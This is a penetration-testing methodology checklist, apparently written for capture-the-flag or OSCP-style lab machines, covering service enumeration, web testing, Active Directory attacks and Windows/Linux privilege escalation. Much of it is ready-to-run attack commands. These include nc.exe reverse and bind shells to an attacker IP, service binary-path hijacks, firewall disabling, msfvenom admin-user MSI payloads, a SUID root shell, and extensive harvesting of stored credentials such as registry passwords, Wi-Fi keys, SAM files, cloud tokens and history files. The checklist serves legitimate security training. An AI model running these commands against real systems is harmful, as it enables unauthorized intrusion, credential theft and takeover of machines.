Proofs
Linux:
Copy hostname && whoami && cat proof.txt && ip a Windows:
Copy hostname && whoami.exe && type proof.txt && ipconfig /all Enumeration
Service Enumeration
MAKE A LIST OF EVERY ENTRY POINT.
Start Enumerating Non-Web Services
For every port remember the principles of:
Checking Version:
Grab banner using netcat or telnet
What is the purpose of this service?
Can we change password , users from other services around?
Can we modify information
can we read information ?
Brute force the service
Use nse scripts or maybe anyting
Any known vulnerability?
Check on google
site:github.com *Service version.release
version + github + exploit search
google search
Every parameter to find version
Every version of exploitdb
Every string from the banner grab
SNMP
Find configuration issues
Run nmap port scan / banner grabbing
Google-Fu
Every paramenter to find versions/apps/bugs
searchsploit every serivce
Google
Every version vulnerability
SMTP
USERENUM
Find configuration issues
Run nmap port scan / banner grabbing
Google- Fu
Every paramenter to find versions/apps/bugs
searchsploit every serivce
Google
Every version vulnerability
POP3
See if we can authenticate as a user
retr <numbers>
Find configuration issues
Run nmap port scan / banner grabbing
Google-Fu
Every paramenter to find versions/apps/bugs
searchsploit every serivce
Google
Every version vulnerability
Ident
Channel through different ports each time
Enumerate Services with Null Sessions
FTP
Find configuration issues
Run nmap port scan / banner grabbing
Google- [ ]Fu
Every paramenter to find versions/apps/bugs
searchsploit every serivce
Google
Every version vulnerability
upload
Identify where we are in the file system
Dont know?google!
Example /var/ftp/anon/<directory-name-ifapplies>
Download recursively all ftp directories using wget
Change binary mode to upload exe
SMB
Mount
Check for permissions smbcacls
Find configuration issues
Run nmap port scan / banner grabbing
Google-Fu
Every paramenter to find versions/apps/bugs
searchsploit every serivce
Google
Every version vulnerability
REDIS
Find configuration issues
Run nmap port scan / banner grabbing
Google-Fu
Every paramenter to find versions/apps/bugs
searchsploit every serivce
Google
Every version vulnerability
Try PHP webshell if we have write access to the /var/www/html/ folder
Try grabbing SSH Keys or uploading them
Try uploading module.so if vulnerable version
If we do not know how to enumerate these services use hacktricks
Identifying default credentials and password reusage:
Look up Version plus default credentials
Try boxname:admin,password
Try version or app name : app name
Try different word other than PASSWORD, e.g: pass, passwd, pwd, user, usr, username, secret, cred, credential, auth, secret)
Brute force
Use cewl to make a passlist if there is a webserver running
Use rockyou.txt if we know that there are users such as admin or root for those services
If we are able to find credentials through our enumeration then we rerun our enumeration
This mean that we will run every null session command with the credentials that we found or we will attempt EVERY vector with the credentials
SMB
Mount
Check upload permissions using smbcalcls
If SMBPass Change was given to you use smbpasswd
REDIS
Try PHP webshell if we have write access to the /var/www/html/ folder
Try grabbing SSH Keys or uploading them
Try uploading module.so if vulnerable version
CME
SMB
If SMBPass Change was given to you use smbpasswd
LDAP
redo the same shit from initial time
Files of importance when looking out for this share
Regardless NO MATTER WHAT YOU FIND YOU WILL LOOK IT UP ON GOOGLE!
code review tools
Credentials for mysql, postgress, mssql
Look for the file specifically on google.com and how to decrypt them
cert files for evil winrm
Web Enumeration
Rustscan
Check for potential auth owner
HTTPS
Look at certificates, check brainfuck for this
If there is proxy
use spose to enumerate behind the proxy
Navigate to site
Enumerate version of CMS, about page, versions
Find configuration issues
Run nmap port scan / banner grabbing
Google-Fu
Every paramenter to find versions/apps/bugs
searchsploit every serivce
Google
Every version vulnerability
Google
If Versions were identified such
Wordpress
wpscan
Check plugins for vulnerabiliies
Droopal
Check changelog.txt for version
Attack vectors
Drupal 7.x Module Services Rce
Jenkins
Identify version and exploits for them
Groovy Script reverse shell
Create new job
Else use curl or cronjob method to execute the commands
Try to get reverse shell
Otherwise hunt down for the master.key and other files needed for decryption
Tomcat
Search vulnerabilities via version number
Use default credential list
Upload war file to get reverse shell
phpMyAdmin
Try Default Creds
root:password
Once in we can upload a shell using a sql query
Enumerate for usernames, emails, user info
Make a userlist using username- [ ]anarchy and other tool
Use these against any service or authentication method.
Make a passlist out of cewl
Try different word other than PASSWORD, e.g: pass, passwd, pwd, user, usr, username, secret, cred, credential, auth, secret)
Enumerate for Upload
Enumerate what extentions we can use to upload
Pair this with FTP, REDIS, and other forms of upload capability.
AT THIS POINT THIS IS WHERE IT MATTERS TO TAKE INTO ACCOUNT WHAT THE VERSION AND TECHNOLOGY BEHIND THE APPLICATION IS, IF THERE IS NO IDENTIFABLE EXPLOIT THAT MEANS THAT THIS IS A WEBSITE MADE BY THE CREATORS OF THE BOX. WE HAVE TO TAKE INTO ACCOUNT NOW THAT WE COULD POSSIBLY HAVE SQLI, CODE INJECTION. OUR PAYLOADS HAVE TO MATCH THE TECHNOLOGY BEHIND THE WEBSITE.
Logical reasoning
Look at the application from a bad guy perspective, what does it do? what is the most valuable part? Some applications will value things more than others, for example a premium website might be more concerned about users being able to bypass the pay wall than they are of say cross-site scripting
Look at the application logic too, how is business conducted?
401 OR 403? Try bypassing that
Use hacktricks for this, I also have a script that does it for you.
nikto
google everything that this returns
there was a box about the api that was exploitable by looking it up on nikto scan (Restack API)
Enumerate directories
if cgi-bin folder was found (shellshock)
Rerun initial enum for this such as source code inspection
Enumerate hidden params
Guess parameters. If there's a POST forgot_pass.php with an email param, try GET /forgot_pass.php?email=%0aid.
Enumerate parameters for RFI, and LFI
Remember relativity and using LFI to expose other services that we could authenticate as.
Check for RCE methods, like every single one of them.
Enumerate SSRF if there is some sort of browser.
Capture hashes via responder
Every parameter or input has to be checked for sql injection
Try enabling the shells depending on the database that is open
otherwise haha xd try to enumerate tables and the whole jargon
Play with post and get requests, this could lead to something displaying
This can be done with curl and BurpSuite
Guess post parameters based on the output, check the werkzeug section of the blog
Play with weak cookies and parameters
Look for weak encryption maybe we could decrypt these into passwords and mess with them by changing them to admin.
Log in forms
Credentials somewhere else in the box.
Exploitation
THESE ARE THE THREE PRINCIPLES OF GETTING IN. THERE IS EITHER A VULNERABLE SERVICE, THIS MAYBE HAS TO BE CHAINED WITH ANOTHER VULNERABILITY. THEN THERE IS PASSWORD SPRAYING, THIS IS BASICALLY CONSITUTES TO DEFAULT CREDS, PASSWORD RESUSAGE, AND THE LAST IS BRUTEFORCING
Vulnerable services
Any known vulnerability
Check on google site:github.com *Service version.release*
We do not have version? But exploits avaliable
IF WE HAVE CODE EXECUTION
Attempt to get reverse shells
if a technique does not work, do every single fucking reverse shell
Troubleshoot the exploit maybe the command needs a certain syntax look at the methodology section of the blog in exploitation
Also play with this remember the mongodb exploit from the labs.
Also try bash -c instead of just the normal bash -i reverse shell.
ALWAYS USE AND CHANNEL THROUGH OPEN PORTS FOR THE REVERSE SHELL
if we do get code execution but no reverse shell because of whatever firewall, our best choice is to look if we can output files in a way where we can use them against other services, these could be used to gain access and uploading shit.
THINK ABOUT SITUATIONAL AWARENESS. Where can we upload? can we use these files to our advantage, remember the thing about redis.
Did we get credentials for any database that are valid ?
Active Directory Based Attacks
If based on our enumeration we found some sort of userlist
Make a list with these with different naming conventions
Validate these users with kerbrute.
If the users are valid
Make a passlist with how we usually do
use cewl if there is a webserver
Try different word other than PASSWORD, e.g: pass, passwd, pwd, user, usr, username, secret, cred, credential, auth, secret)
Validate these creds with netexec
winrm
However Rerun all enumeration from before if we find these are valid
Password Reusage
Spraying
Same principle as other things discussed, we make a list out of everything we see and every username, name, version is valuable to us.
Privilege Escalation
Windows
Enumerate current user and its permissions
Copy SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
Copy whoami /all
net users %username%
net users
Get-WmiObject -Class Win32\_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Copy net localgroup
net localgroup Administrators Check if current user has these tokens:
Copy SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege System Enumeration
Copy systeminfo | findstr /B /C:"OS Name" /C:"OS Version" Installed patches and updates
Copy wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
Copy wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
Copy wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\\FileSystem"}| ft Name,Root Network Enumeration
ARE THE RUNNING SERVICES RUNNING AS OTHER USERS? CAN WE MODIFY THE WEBSTE MAYBE BY PASTING A PHP FILE THAT RUNS AS THE USER WHO HOSTS THE WEBSITE
TRANSFER PLINK
List all NICs, IP and DNS
Copy ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Copy route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
Copy arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State List current connections correlated to running service (requires elevated privs)
List firewall state and config
Copy netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config List firewall's blocked ports
Copy $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
Copy netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
Copy net share
powershell Find-DomainShare -ComputerDomain domain.local
Copy reg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\SNMP /s
Get-ChildItem -path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\SNMP -Recurse Credential Access
Go from medium mandatory level to high mandatory level
Copy # using powershell
powershell.exe Start-Process cmd.exe -Verb runAs
Copy # check also with runas
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe" Creds from config files (Try different words e.g: pass, passwd, pwd, user, usr, username, secret, cred, credential, auth):
Copy dir /s /b /p *pass* == *cred* == *vnc* == *.config* == *conf* == *ini*
findstr /si /m password *.xml *.ini *.txt
Copy cmdkey /list
# if found
runas /savecred /user:WORKGROUP\Administrator "\\attacker-ip\SHARE\welcome.exe"
Copy reg query HKLM /f pass /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
# SNMP parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
# Putty credentials
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\
# VNC credentials
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4" /v password
## OpenSSH credentials
reg query HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys Creds from Unattend or Sysprep Files
Copy c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattend*.xml
%WINDIR%\Panther\Unattend*.xml
Copy dir /s /b /p *access*.log* == *.log Creds from IIS web config
Copy Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config Check other possible interesting files
Copy dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*vnc.ini, ultravnc.ini, \*vnc\*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
setupinfo
setupinfo.bak
key3.db #Firefox
key4.db #Firefox
places.sqlite #Firefox
"Login Data" #Chrome
Cookies #Chrome
Bookmarks #Chrome
History #Chrome
TypedURLsTime #IE
TypedURLs #IE
Copy # 1. Find AP SSID
netsh wlan show profile
# 2. Get cleartext password
netsh wlan show profile <SSID> key=clear
# OR
# Go hard and grab 'em all
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on Creds from sticky notes app
Copy c:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
Copy # SessionGopher to grab PuTTY, WinSCP, FileZilla, SuperPuTTY, RDP
# https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm\-arvanaghi -p s3cr3tP@ss Creds from Powershell History
Copy type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
Copy Get-Item -path <filename> -Stream *
Get-Content -path <filename> -Stream <keyword>
Copy # Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Copy # From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json
Copy # Before Vista look inside
C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history
# After Vista look inside
C:\ProgramData\Microsoft\Group Policy\history
# Look for
Groups.xml
Services.xml
Scheduledtasks.xml
DataSources.xml
Printers.xml
Drives.xml
# Decrypt the passwords with
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
Copy HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
HKCU\Software\Microsoft\Terminal Server Client\Servers\ Remote desktop credential manager
Copy %localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Copy # Check if the retrieved sotfwares are vulnerable to DLL Sideloading
# https://github.com/enjoiz/Privesc
$result = Get-WmiObject -Namespace "root\\ccm\\clientSDK" -Class CCM\_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." } Exploit
Services running on localhost
Copy # List of exploits kernel https://github.com/SecWiki/windows-kernel-exploits
# to cross compile a program from Kali
$ i586-mingw32msvc-gcc -o adduser.exe useradd.c Misconfiguration
Can we restart the machine?
Can we start and stop the service?
Copy # using sc
sc qc <service_name>
# using accesschk.exe
accesschk.exe -ucqv <Service_Name>
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
# using msf
exploit/windows/local/service_permissions
Copy wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\" |findstr /i /v ""
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\system32\" |findstr /i /v "" #Not only auto services
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '*'} | select PathName,DisplayName,Name Change service binary path
Copy # if the group "Authenticated users" has SERVICE_ALL_ACCESS
# it can modify the binary path
# bind shell
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
# reverse shell
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe <attacker-ip> 4444 -e cmd.exe"
# add user to local admin group
sc config <Service_Name> binpath= "net localgroup administrators username /add"
# example using SSDPRV
sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
# then restart the service
wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name] DLL Hijacking / Overwrite service binary
Copy for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"
# do it by using sc
sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt Registry modify permissions
Copy reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services
#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
# if Authenticated Users or NT AUTHORITY\INTERACTIVE have FullControl
# it can be leveraged to change the binary path inside the registry
reg add HKLM\SYSTEM\CurrentControlSet\srevices\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f Installed applications
DLL Hijacking for installed applications
Copy dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name Write permissions
Copy # using accesschk.exe
accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*
# using icalcs
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"
# using Powershell
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}} PATH DLL Hijacking
Copy # having write permissions inside a folder present ON PATH could bring to DLL hijacking
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. ) AlwaysInstallElevated set in Registry
Copy # if both are enabled (set to 0x1), it's possible to execute
# any .msi as NT AUTHORITY\SYSTEM
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# check with msf
exploit/windows/local/always_install_elevated
# generate payload with msfvenom
# no uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi
# using the msiexec the uac wont be prompted
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi
# install .msi
msiexec /quiet /qn /i C:\Users\Homer.NUCLEAR\Downloads\donuts.msi Scheduled tasks
Copy # using schtasks
schtasks /query /fo LIST /v
# filtering the output
schtasks /query /fo LIST /v | findstr /v "\Microsoft"
# using powershell
Get-ScheduledTask | ft TaskName,TaskPath,State
# filtering the output
Get-ScheduledTask | where {$_.TaskPath -nolike "\Microsoft*"} | ft TaskName,TaskPath,State Executable file writeable
Windows Subsystem For Linux
Copy wsl whoami
./ubuntum2004.exe config --default-user root
wsl whoami
wsl python -c 'put here your command' Navigate to the fileystem and look for weird folders that contain weird scripts that run every so often, replace them if we can.
Linux
Principles to becoming root!
cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash
Make the user run commands without needing password sudo -l
Upgrade shell using socat, else python
Are we in a dock container? If so this can be seen by doing an ls - [ ]la. See how to escape from the notes
Run SUDO Killer if we have full SSH creds
Go Thru the linpeas.sh output
PwnKit? This is an easy win.
enumerate users
Try to switch users and rerun enumeration
Try different word other than PASSWORD, e.g: pass, passwd, pwd, user, usr, username, secret, cred, credential, auth, secret)
Enumerate groups
fail2ban Any accessible sensitive file?
Check env info
Copy (env || set) 2>/dev/null
echo $PATH Look through SUID set
refer to gtfobins for this
LOOK EVEN FOR CUSTOM ONES AND USE THEM!
Are these missing libraries?
Do we have write access to the LD_LIBRARY_PATH? IF yes
Generate our own .so file and paste it in the writable path
Enumerate internal running services
If there is a website play with curl
Are these running as other users that we can become?
If there is a database running we can enuemrate for credentials to test for UDF
Remote port forward if we have SSH access.
Init, init.d systemd Services?
Can we start or stop the service
Can we reboot the machine?
Check for Cronjobs
Are these missing a library when running?
Can we overwrite the library path
GOOGLE EVERYTHING HERE ,some custom scripts have vulnerable expressions.
Password Search
Search creds from config files (Try different word other than PASSWORD, e.g: pass, passwd, pwd, user, usr, username, secret, cred, credential, auth, secret):
Copy grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null
locate password | more Search creds in common files:
Copy history
cat ~/.bash_history Search creds from local DBs
Search creds from bash history:
Copy history
cat ~/.bash_history Search creds from memory:
Copy strings /dev/mem -n10 | grep -i PASS SSH keys:
Copy cat ~/.ssh/id_rsa
ls ~/.ssh/*
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null Search rsync config file
Copy find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \) Transfer Linux Exploit Suggester
Try the most probable exploits
Enumerate processes that run as root and look for weird things.
Enumerate the file system and see if there are weird files that we can overwrite
check /opt and /srv, expecting to find both empty
you could also try find / - [ ]name "*.py"
Check for weird folders and see if tehre are any bash scripts that we could also modify
